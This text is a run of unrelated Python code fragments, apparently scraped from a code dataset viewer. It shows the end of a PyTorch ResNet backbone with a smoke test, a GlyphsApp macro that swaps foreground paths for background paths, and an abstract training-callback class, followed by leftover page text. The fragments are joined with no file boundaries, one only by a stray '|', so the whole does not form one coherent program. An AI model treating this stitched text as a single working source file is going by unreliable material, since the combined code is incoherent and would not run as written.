        expanded = planes * block.expansion
        # Project the shortcut whenever stride or channel count changes.
        downsample = None
        if s != 1 or self.inplanes != expanded:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, expanded, 1, s, bias=False),
                nn.BatchNorm2d(expanded)
            )
        stage = [block(self.inplanes, planes, s, downsample)]
        stage += [block(expanded, planes) for _ in range(1, depth)]
        self.inplanes = expanded  # next stage consumes this many channels
        return nn.Sequential(*stage)

    def forward(self, x: Tensor) -> Tensor:
        x = self.maxpool(F.relu(self.bn1(self.conv1(x))))  # [N, 64, H/4, W/4]
        x1 = self.layer1(x)   # [N, 64 or 256,   H/4,  W/4]
        x2 = self.layer2(x1)  # [N, 128 or 512,  H/8,  W/8]
        x3 = self.layer3(x2)  # [N, 256 or 1024, H/16, W/16]
        x4 = self.layer4(x3)  # [N, 512 or 2048, H/32, W/32]
        return x1, x2, x3, x4
if __name__ == '__main__':
    # Smoke test: build ResNet-50, load local weights (strict=False so extra
    # or missing keys such as the fc head are tolerated), and print the four
    # stage output shapes.
    model = ResNet('50')
    model.load_state_dict(torch.load('checkpoints/backbones/resnet/resnet50.pth', map_location='cpu'), strict=False)
    x = torch.zeros(1, 3, 224, 224)
    outs = model(x)
    for y in outs:
        print(y.shape)
# MenuTitle: Replace Foreground with Background Paths
# -*- coding: utf-8 -*-
__doc__ = """
Replaces only the paths in the current active layer with those from the background.
"""
# For every layer of the glyph owning the current selection: delete the
# foreground paths in reverse index order (so deletion does not shift the
# remaining indices), then copy in the background paths.
# `Glyphs` is injected by the GlyphsApp macro environment.
for l in Glyphs.font.selectedLayers[0].parent.layers:
    for pi in reversed(range(len(l.paths))):
        del l.paths[pi]
    for p in l.background.paths:
        l.paths.append(p)
|
class AbstractCallback:
    """
    Interface that defines how callbacks must be specified.
    """

    def __call__(self, epoch, step, performance_measures, context):
        """
        Invoked by the ModelTrainer after every batch; subclasses must override.

        Parameters:
            epoch (int): current epoch number
            step (int): current batch number
            performance_measures (dict): losses and metrics based on a running average
            context (ModelTrainer): reference to the calling ModelTrainer, allows to access members
        """
        raise NotImplementedError

    def close(self):
        """
        Hook for cleanup work; called once at the end of the last epoch.
        The default implementation is a no-op.
        """
        pass
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.